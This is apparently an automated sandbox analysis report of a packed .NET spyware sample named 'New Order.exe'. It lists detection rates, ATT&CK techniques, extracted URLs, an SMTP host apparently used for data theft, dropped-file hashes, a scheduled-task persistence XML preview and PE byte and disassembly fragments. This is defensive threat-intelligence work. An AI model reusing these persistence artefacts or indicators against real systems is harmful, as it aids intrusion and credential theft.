External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion24	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection12	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
New Order.exe	25%	Virustotal		Browse
New Order.exe	28%	ReversingLabs	ByteCode-MSIL.Packed.Generic
New Order.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe	28%	ReversingLabs	ByteCode-MSIL.Packed.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.New Order.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
smtp.pulpdant.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://SgOtfE.com	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://api.ipify.org%$	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
https://sO7lUZh6d9PCQs.org	0%	Avira URL Cloud	safe
http://smtp.pulpdant.com	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.224	true	false		high
smtp.pulpdant.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sO7lUZh6d9PCQs.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.apache.org/licenses/LICENSE-2.0	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://DynDns.comDynDNS	New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://us2.smtp.mailhostbox.com	New Order.exe, 00000003.00000002.691773465.00000000033DE000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://SgOtfE.com	New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%$	New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.carterandcone.coml	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://smtp.pulpdant.com	New Order.exe, 00000003.00000002.691773465.00000000033DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	New Order.exe, 00000000.00000002.365875763.00000000042E9000.00000004.00000001.sdmp, New Order.exe, 00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.91.199.224	unknown	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345000
Start date:	27.01.2021
Start time:	15:38:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	New Order.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/3@2/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 93% Number of executed functions: 48 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 168.61.161.212, 67.26.81.254, 8.248.121.254, 8.241.123.254, 67.27.159.254, 67.27.158.126, 23.210.248.85 Excluded domains from analysis (whitelisted): fs.microsoft.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:39:38	API Interceptor	989x Sleep call for process: New Order.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
208.91.199.224	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse
	para.exe	Get hash	malicious	Browse
	New Order #21076.exe	Get hash	malicious	Browse
	New order.PDF.exe	Get hash	malicious	Browse
	7xCBr7CChD.exe	Get hash	malicious	Browse
	Purchase Order no 7770022460.exe	Get hash	malicious	Browse
	ezs8BPdIwM.exe	Get hash	malicious	Browse
	FedEx Receipt.exe	Get hash	malicious	Browse
	UAE CHEMEX RFQ.exe	Get hash	malicious	Browse
	UAE CHEMEX PPMC.exe	Get hash	malicious	Browse
	quote 2021.exe	Get hash	malicious	Browse
	MV Double Miracle.exe	Get hash	malicious	Browse
	PO-SOT215006A.exe	Get hash	malicious	Browse
	invoice No 8882.exe	Get hash	malicious	Browse
	Y3fwLpzaXNZPaT6.exe	Get hash	malicious	Browse
	Proforma Invoice.exe	Get hash	malicious	Browse
	BANK SWIFT.xlsx	Get hash	malicious	Browse
	Shipping_Document.exe	Get hash	malicious	Browse
	DUBAI HC21RED21.exe	Get hash	malicious	Browse
	December_Document_.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	DHL_SD-0127.exe	Get hash	malicious	Browse	208.91.199.223
	HTG-9087650.exe	Get hash	malicious	Browse	208.91.198.143
	TACSAL.xlsx	Get hash	malicious	Browse	208.91.199.225
	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse	208.91.199.223
	para.exe	Get hash	malicious	Browse	208.91.199.225
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse	208.91.199.224
	para.exe	Get hash	malicious	Browse	208.91.199.224
	SIC_9827906277.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	Quotation Prices.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.PackedNET.519.20020.exe	Get hash	malicious	Browse	208.91.199.225
	SSE_SOA2021.doc	Get hash	malicious	Browse	208.91.198.143
	HTG-9066543.exe	Get hash	malicious	Browse	208.91.199.223
	New Order #21076.exe	Get hash	malicious	Browse	208.91.199.224
	HTMY-209871640.exe	Get hash	malicious	Browse	208.91.198.143
	SecuriteInfo.com.Artemis707F61F6A223.exe	Get hash	malicious	Browse	208.91.199.225
	New order.PDF.exe	Get hash	malicious	Browse	208.91.199.224
	SOA.exe	Get hash	malicious	Browse	208.91.199.225
	7xCBr7CChD.exe	Get hash	malicious	Browse	208.91.199.224
	Purchase Order no 7770022460.exe	Get hash	malicious	Browse	208.91.199.224
	Payment slip.exe	Get hash	malicious	Browse	208.91.198.143

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	DHL_SD-0127.exe	Get hash	malicious	Browse	208.91.199.223
	Statement of Account as of Jan_27 2021.xlsm	Get hash	malicious	Browse	208.91.199.150
	HTG-9087650.exe	Get hash	malicious	Browse	208.91.198.143
	TACSAL.xlsx	Get hash	malicious	Browse	208.91.199.225
	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse	208.91.199.223
	para.exe	Get hash	malicious	Browse	208.91.199.225
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse	208.91.199.224
	para.exe	Get hash	malicious	Browse	208.91.199.224
	SIC_9827906277.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	Quotation Prices.exe	Get hash	malicious	Browse	208.91.199.223
	SecuriteInfo.com.Trojan.PackedNET.519.20020.exe	Get hash	malicious	Browse	208.91.199.225
	Shipping_Details.exe	Get hash	malicious	Browse	204.11.58.28
	Request.xlsx	Get hash	malicious	Browse	103.53.40.13
	HTG-9066543.exe	Get hash	malicious	Browse	208.91.199.223
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	216.10.246.131
	New Order #21076.exe	Get hash	malicious	Browse	208.91.199.224
	k.dll	Get hash	malicious	Browse	162.215.252.76
	HTMY-209871640.exe	Get hash	malicious	Browse	208.91.198.143
	SecuriteInfo.com.Artemis707F61F6A223.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exe	Get hash	malicious	Browse	43.225.55.205

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order.exe.log Download File
Process:	C:\Users\user\Desktop\New Order.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmpC36D.tmp Download File
Process:	C:\Users\user\Desktop\New Order.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	5.158121730065876
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3N7jBtn:cbha7JlNQV/rydbz9I3YODOLNdq3HL
MD5:	A2AC6FF93CAA0763F08A2260EA6B020F
SHA1:	C199D8254A59E5AFC0EE0BB74C59CBD492883793
SHA-256:	F0B6CE4BC288CD1665C764377B297D65ED685D43B36531851603A9E9E68025BD
SHA-512:	5A877C6550BA90D15BBD11342A29D443A7BE3B2A70563CBBB9B410DB582A4BD04F2A19F2E87F487D876F6785CA89D0B14610F1360F47A7332924BDAC3FA9F23A
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe Download File
Process:	C:\Users\user\Desktop\New Order.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	833024
Entropy (8bit):	7.3889428875564445
Encrypted:	false
SSDEEP:	12288:liqfu19XBtqKuCwaBDKKHvlBQ+8mlOYaB+:lSXBtq9ZaskX188aB
MD5:	3462AFCBDB0969B7F24B42F0E42C7988
SHA1:	6429F37ABDF26C93793ECCDD8DC0ECAFFB149655
SHA-256:	112F430A8CC28D3889163BBAF9811C74C3D2AF2C9AF672D16F0F7888DF6D51E2
SHA-512:	4656F47988A96F6ABB0E27D2C6A8BDFA69B41BC75A67B2C7D99EF45A4755E81450DA02434CA2F7CC7A5441B99810DC90E372C74214FF723A3400B2AEF3595029
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.`..............0.............R.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...X.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................4.......H.......d...._......y....=..............................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r1..p~....o......t.....+..".(.....Vr?..p.....rK..p.....^..}.....(.......(......0..J.........r[..pr...p(....&.(....t!...o.......#..r...p.o....(....r...p...(....&.............%&.# ....0..+.........,..{.......+....,...{....o .......(!......0............s"...}.....s"...}.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.3889428875564445
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	New Order.exe
File size:	833024
MD5:	3462afcbdb0969b7f24b42f0e42c7988
SHA1:	6429f37abdf26c93793eccdd8dc0ecaffb149655
SHA256:	112f430a8cc28d3889163bbaf9811c74c3d2af2c9af672d16f0f7888df6d51e2
SHA512:	4656f47988a96f6abb0e27d2c6a8bdfa69b41bc75a67b2c7d99ef45a4755e81450da02434ca2f7cc7a5441b99810dc90e372c74214ff723a3400b2aef3595029
SSDEEP:	12288:liqfu19XBtqKuCwaBDKKHvlBQ+8mlOYaB+:lSXBtq9ZaskX188aB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.`..............0.............R.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	e0dc9e0e1e9296e8

Static PE Info

General
Entrypoint:	0x4bc152
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60114C8A [Wed Jan 27 11:20:42 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc100	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0x10e98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
